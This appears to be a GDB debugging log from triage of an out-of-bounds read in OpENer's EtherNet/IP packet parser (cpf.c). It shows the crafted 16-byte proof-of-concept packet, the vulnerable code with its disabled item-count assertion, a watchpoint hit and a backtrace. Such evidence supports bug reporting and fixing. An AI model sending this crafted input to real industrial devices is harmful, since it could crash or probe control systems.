=== Break on target function ===
Breakpoint 1 at 0x2f214a: file /root/OpENer/source/src/enet_encap/cpf.c, line 239.
=== Run with PoC ===

Breakpoint 1, CreateCommonPacketFormatStructure (data=0x50e92e <incomplete sequence \350>, data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:239
239	  common_packet_format_data->address_info_item[0].type_id = 0;
=> 0x00000000002f214a <CreateCommonPacketFormatStructure+10>:	66 c7 05 9d 6f 21 00 00 00	movw   $0x0,0x216f9d(%rip)        # 0x5090f0 <g_common_packet_format_data_item+32>
=== Function entry ===
#0  CreateCommonPacketFormatStructure (data=0x50e92e <incomplete sequence \350>, data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:239
239	  common_packet_format_data->address_info_item[0].type_id = 0;
=> 0x00000000002f214a <CreateCommonPacketFormatStructure+10>:	66 c7 05 9d 6f 21 00 00 00	movw   $0x0,0x216f9d(%rip)        # 0x5090f0 <g_common_packet_format_data_item+32>
data = 0x50e92e <incomplete sequence \350>
data_length = 16
common_packet_format_data = <optimized out>
length_count = <optimized out>
item_count = <optimized out>
cpf_start = 0x50e92e
cpf_len   = 16
cpf_end   = 0x50e93e
cpf_end - cpf_start = 16
=== CPF bytes ===
0x50e92e:	0x01	0xe8	0x00	0x00	0x00	0x00	0xb2	0x00
0x50e936:	0x06	0x00	0x04	0x02	0x20	0x01	0x24	0x01
0x50e92e:	0x01	0xe8	0x00	0x00	0x00	0x00	0xb2	0x00
0x50e936:	0x06	0x00	0x04	0x02	0x20	0x01	0x24	0x01
0x50e93e:	0x00	0x80	0x40	0x3b	0x04	0x00	0xb8	0xff
=== Source region ===
239	  common_packet_format_data->address_info_item[0].type_id = 0;
240	  common_packet_format_data->address_info_item[1].type_id = 0;
241	
242	  size_t length_count = 0;
243	  CipUint item_count = GetUintFromMessage(&data);
244	  //OPENER_ASSERT(4U >= item_count);/* Sanitizing data - probably needs to be changed for productive code */
245	  common_packet_format_data->item_count = item_count;
246	  length_count += 2;
247	  if(common_packet_format_data->item_count >= 1U) {
248	    common_packet_format_data->address_item.type_id = GetUintFromMessage(&data);
249	    common_packet_format_data->address_item.length = GetUintFromMessage(&data);
250	    length_count += 4;
251	    if(common_packet_format_data->address_item.length >= 4) {
252	      common_packet_format_data->address_item.data.connection_identifier =
253	        GetUdintFromMessage(&data);
254	      length_count += 4;
255	    }
256	    if(common_packet_format_data->address_item.length == 8) {
257	      common_packet_format_data->address_item.data.sequence_number =
258	        GetUdintFromMessage(&data);
259	      length_count += 4;
260	    }
261	  }
262	  if(common_packet_format_data->item_count >= 2) {
263	    common_packet_format_data->data_item.type_id = GetUintFromMessage(&data);
264	    common_packet_format_data->data_item.length = GetUintFromMessage(&data);
265	    common_packet_format_data->data_item.data = (EipUint8 *) data;
266	    if(data_length >=
267	       length_count + 4 + common_packet_format_data->data_item.length) {
268	      data += common_packet_format_data->data_item.length;
269	      length_count += (4 + common_packet_format_data->data_item.length);
270	    } else {
271	      return kEipStatusError;
272	    }
273	
274	    /* Data type per CIP Volume 2, Edition 1.4, Table 2-6.1. */
275	    CipUint address_item_count = (CipUint)(common_packet_format_data->item_count - 2U);
276	
277	    for(size_t j = 0; j < (address_item_count > 2 ? 2 : address_item_count);
278	        j++)                                                                      /* TODO there needs to be a limit check here???*/
279	    {
280	      common_packet_format_data->address_info_item[j].type_id =
281	        GetIntFromMessage(&data);
282	      OPENER_TRACE_INFO("Sockaddr type id: %x\n",
283	                        common_packet_format_data->address_info_item[j].type_id);
284	      length_count += 2;
285	      if( (common_packet_format_data->address_info_item[j].type_id ==
286	           kCipItemIdSocketAddressInfoOriginatorToTarget)
287	          || (common_packet_format_data->address_info_item[j].type_id ==
288	              kCipItemIdSocketAddressInfoTargetToOriginator) ) {
289	        common_packet_format_data->address_info_item[j].length =
290	          GetIntFromMessage(&data);
291	        common_packet_format_data->address_info_item[j].sin_family =
292	          GetIntFromMessage(&data);
293	        common_packet_format_data->address_info_item[j].sin_port =
294	          GetIntFromMessage(&data);
295	        common_packet_format_data->address_info_item[j].sin_addr =
296	          GetUdintFromMessage(&data);
297	        for(size_t i = 0; i < 8; i++) {
298	          common_packet_format_data->address_info_item[j].nasin_zero[i] = *data;
299	          data++;
300	        }
301	        length_count += 18;
=== Step over item_count read ===
240	  common_packet_format_data->address_info_item[1].type_id = 0;
=> 0x00000000002f2153 <CreateCommonPacketFormatStructure+19>:	66 c7 05 a8 6f 21 00 00 00	movw   $0x0,0x216fa8(%rip)        # 0x509104 <g_common_packet_format_data_item+52>
$1 = <optimized out>
$2 = <optimized out>
$3 = 0x50e92e
$4 = 0
=== Set read watchpoint on first byte past CPF slice ===
Hardware read watchpoint 2: *$cpf_end
=== Continue until first out-of-bounds read ===

Hardware read watchpoint 2: *$cpf_end

Value = 0 '\000'
CreateCommonPacketFormatStructure (data=0x50e93e "", data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:280
280	      common_packet_format_data->address_info_item[j].type_id =
=> 0x00000000002f2368 <CreateCommonPacketFormatStructure+552>:	66 45 89 5a ed     	mov    %r11w,-0x13(%r10)
=== Out-of-bounds read evidence ===
#0  CreateCommonPacketFormatStructure (data=0x50e93e "", data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:280
#1  0x00000000002f30f6 in NotifyCommonPacketFormat (received_data=0x7fffffffd838, originator_address=0x7fffffffdb18, outgoing_message=0x7fffffffdb50) at /root/OpENer/source/src/enet_encap/cpf.c:46
#2  HandleReceivedSendRequestResponseDataCommand (receive_data=0x7fffffffd838, originator_address=0x7fffffffdb18, outgoing_message=0x7fffffffdb50) at /root/OpENer/source/src/enet_encap/encap.c:558
#3  HandleReceivedExplictTcpData (socket=1, buffer=<optimized out>, length=<optimized out>, number_of_remaining_bytes=<optimized out>, originator_address=0x7fffffffdb18, outgoing_message=0x7fffffffdb50) at /root/OpENer/source/src/enet_encap/encap.c:186
#4  0x00000000002df7bd in main () at /root/OpENer/source/src/utils/enipmessage.c:12
#0  CreateCommonPacketFormatStructure (data=0x50e93e "", data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:280
280	      common_packet_format_data->address_info_item[j].type_id =
=> 0x00000000002f2368 <CreateCommonPacketFormatStructure+552>:	66 45 89 5a ed     	mov    %r11w,-0x13(%r10)
data = 0x50e93e ""
data_length = 16
common_packet_format_data = <optimized out>
j = <optimized out>
address_item_count = <optimized out>
length_count = 16
item_count = 59393
$5 = 0xe801
$6 = 0x50e93e
$7 = 16
data == cpf_end ? 1
=== Source at out-of-bounds read site ===
274	    /* Data type per CIP Volume 2, Edition 1.4, Table 2-6.1. */
275	    CipUint address_item_count = (CipUint)(common_packet_format_data->item_count - 2U);
276	
277	    for(size_t j = 0; j < (address_item_count > 2 ? 2 : address_item_count);
278	        j++)                                                                      /* TODO there needs to be a limit check here???*/
279	    {
280	      common_packet_format_data->address_info_item[j].type_id =
281	        GetIntFromMessage(&data);
282	      OPENER_TRACE_INFO("Sockaddr type id: %x\n",
283	                        common_packet_format_data->address_info_item[j].type_id);
284	      length_count += 2;
285	      if( (common_packet_format_data->address_info_item[j].type_id ==
286	           kCipItemIdSocketAddressInfoOriginatorToTarget)
287	          || (common_packet_format_data->address_info_item[j].type_id ==
288	              kCipItemIdSocketAddressInfoTargetToOriginator) ) {
289	        common_packet_format_data->address_info_item[j].length =
290	          GetIntFromMessage(&data);
291	        common_packet_format_data->address_info_item[j].sin_family =
292	          GetIntFromMessage(&data);
293	        common_packet_format_data->address_info_item[j].sin_port =
294	          GetIntFromMessage(&data);
295	        common_packet_format_data->address_info_item[j].sin_addr =
296	          GetUdintFromMessage(&data);
297	        for(size_t i = 0; i < 8; i++) {
298	          common_packet_format_data->address_info_item[j].nasin_zero[i] = *data;
299	          data++;
300	        }
301	        length_count += 18;
=== Nearby instructions ===
Dump of assembler code from 0x2f2358 to 0x2f2378:
280	      common_packet_format_data->address_info_item[j].type_id =
=> 0x00000000002f2368 <CreateCommonPacketFormatStructure+552>:	mov    %r11w,-0x13(%r10)

281	        GetIntFromMessage(&data);
282	      OPENER_TRACE_INFO("Sockaddr type id: %x\n",
283	                        common_packet_format_data->address_info_item[j].type_id);
284	      length_count += 2;
285	      if( (common_packet_format_data->address_info_item[j].type_id ==
286	           kCipItemIdSocketAddressInfoOriginatorToTarget)
287	          || (common_packet_format_data->address_info_item[j].type_id ==
   0x00000000002f236d <CreateCommonPacketFormatStructure+557>:	cmp    $0xffff8001,%r11d
   0x00000000002f2374 <CreateCommonPacketFormatStructure+564>:	jle    0x2f23c0 <CreateCommonPacketFormatStructure+640>
   0x00000000002f2376 <CreateCommonPacketFormatStructure+566>:	cs nopw 0x0(%rax,%rax,1)

End of assembler dump.
=== Stop logging ===
